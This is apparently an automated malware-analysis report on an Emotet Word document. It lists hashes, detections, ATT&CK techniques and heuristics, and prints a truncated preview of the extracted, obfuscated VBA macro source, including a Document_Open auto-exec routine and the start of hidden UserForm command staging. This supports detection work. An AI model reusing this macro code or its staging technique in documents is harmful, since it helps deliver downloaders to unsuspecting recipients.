Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 30414941a8d8e2a2…

MALICIOUS

Office (OLE)

Size: 207.8 KB
Created: 2019-12-19 06:45:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: b97abb20baf6743c7669bde4171cae40
SHA-1: d4a5152d72b80b93e8c2d4f053149be3798e9ab6
SHA-256: 30414941a8d8e2a28dd8e62cad6e5780b0677eeb2e6629a8bd3f71c014045f25
Risk Score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro and a hidden-property command stager, which are indicative of Emotet malware. The ClamAV detection explicitly names Emotet. The macro's obfuscated nature and use of CreateObject and GetObject suggest it is designed to download and execute a second-stage payload.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7465225-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7465225-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13647 bytes
SHA-256: 8448570783b482355bb2ba6658abaae578280447a24811ee2623a3f78e8197f6

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Mxvhbduvaman"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Txystuopctf, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Mcmezirzle = "Autem."
Dim Xzgrbdrhv As Double
Dim Oaxczkfvqy As Integer
Alccymuaiaaoh = ("Aut deserunt unde.")
Dim Qmdgqfryebgr As Double
Dim Jwhaafgya As Integer
Dim Agcnajvippin As Double
Timxbsvfu = Soglormkm
Dim Pkerkjzraiqsh As Boolean
Azbzumcjhvpx = ("Ut.")
Dim Wdfrutbtjhlgd As Integer
Dim Cvznvqnjmvmmb As String
Dim Vlztdfkbmdrhp As Boolean
Oidnfaqjegj = "Dolorem labore ut facilis."
Dim Wihzxomahjvp As String
Dim Mjdjxpzhdioq As Integer
Dim Bumumsfdw As String
Bgngzixogd = ("Et nemo.")
Dim Wldtofyl As Boolean
Hymwadyoinmz = 557
Maezrcpbbt = Izqyxgdizo
Htprunow = 783
Pryvjnjxfcbgq
   Czwewqwsu = "Accusamus voluptates quis quia."
Dim Uysohauilh As Double
Dim Jwxhobssdbs As Boolean
Uzcssvddxcnxf = ("Soluta voluptas voluptas.")
Dim Xxuzkjniy As Boolean
Dim Qblfsgorm As Boolean
Dim Qtmpmlukjikk As Integer
Hstnhrdjk = Srkhjoeg
Dim Bnuwcnoyz As Double
Pzknudejogj = ("Nulla.")
Dim Ttkdaugeqzg As Double
Dim Rfdokkykcszto As String
Dim Xqasfgcidlyfa As Double
Aeiwmzfavyjdr = "Earl"
Dim Jljghaynar As Double
Dim Acmexxdruksyz As Integer
Dim Etvclhtbmwt As Boolean
Crieydfxiulfn = ("Maxime repellat sed.")
Dim Ztlgpktuepc As String
Baietepdc = 832
Wmrvyjwyxccsl = Oiwdpwoywim
Ivmwfljdsx = 825
End Sub

Attribute VB_Name = "Bxxiwjdrz"
Attribute VB_Base = "0{39A0656F-35F6-4270-A556-C76A3D36ABF4}{BE9C00E4-ED20-4F49-B983-E34C02E4FB76}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Jneeyenvp"
Function Jcehcnue()
   Ensdgeoyv = "Whitney"
Dim Awkyyahd As String
Dim Ebttmtpdwld As Integer
Miivefrshuk = ("Temporibus dicta libero nam.")
Dim Azxvgzctam As String
Dim Ukyuzyxghy As Integer
Dim Fdxsvxhjgdt As Double
Aeervlvkl = Sxhvmgbcigqd
Dim Ydfodrrioy As Integer
Plmvfttczxpl = ("Voluptas in tempora.")
Dim Brhzjachxipvi As String
Dim Kjibtrqp As Double
Dim Wkykantq As Integer
Abootqhnefk = "Hannah"
Dim Zpngkdik As Integer
Dim Ynqdxwuweecd As Double
Dim Thckckiqljzu As Integer
Invfyiqbd = ("Temporibus rem culpa.")
Dim Rkjfgywgtm As Integer
Xhrkhbgd = 909
Mnrjxeberd = Lazlfldo
Fmxxhxiaxjgh = 833
Ncwneqgiqyxj = Mxvhbduvaman.Txystuopctf
   Rindwbmxq = "Aspernatur et repellendus."
Dim Irilvnuyibepp As Boolean
Dim Ohlldzcnjkqp As Integer
Grrhraxv = ("Et numquam enim iste.")
Dim Ojmpgmtykcmfl As String
Dim Xgeybfxmxcj As Double
Dim Xswthoxtm As Boolean
Wqrfgoagn = Utwyrrxpnwzm
Dim Fsxwhuksxckn As Double
Ibdandxdw = ("Sunt et quos at ut placeat eos.")
Dim Fvxzkxermavdj As String
Dim Kbwundys As Integer
Dim Tzywvcvnab As String
Tnefvffmxtt = "Est architecto veritatis reprehenderit."
Dim Vhcvshdpoqxg As String
Dim Xaqjebxiipih As Integer
Dim Vnzfldzvtr As Integer
Vxfwgzbohmhk = ("Officiis facere asperiores corporis vel impedit ut ut.")
Dim Vmymnkoqta As String
Urrbgyckfzdm = 458
Geejgpqzin = Ewffeffoe
Ffihegwiledej = 397
Wnjexnaezdjpp = Ncwneqgiqyxj + Bxxiwjdrz.Ilgeerriroqje + Bxxiwjdrz.Mhtyuxfg + Bxxiwjdrz.Fnxfrqfjld
   Mmlugsclu = "Penny"
Dim Plwgetihtoq As Double
Dim Xdcclnqhlndql As Boolean
Fscoaoxqlp = ("Ipsa facere sed reiciendis inventore neque veniam voluptatem autem.")
Dim Oqqrwmmwdqzz As Boolean
Dim Fextqsowcbl As Integer
Dim Kamqmtsbqvvhd As String
Ioschkitt = Zgsoogtnbwrzn
Dim Ooiblmsgnnj As Boolean
Ocgtynuljcgp = ("Omnis enim soluta deserunt itaque velit consequatur quos.")
Dim Ylrofxtwtkr As String
Dim Gaeafxzzzq As Double
Dim Zldelcly As Integer
Uvyelbsiwbrc = "Eaque provident distinctio debitis."
Dim Fcasorzvun As String
Dim Prhifiolgi As Boolean
Dim Mxgqtwkx As Boolean
Zj
... (truncated)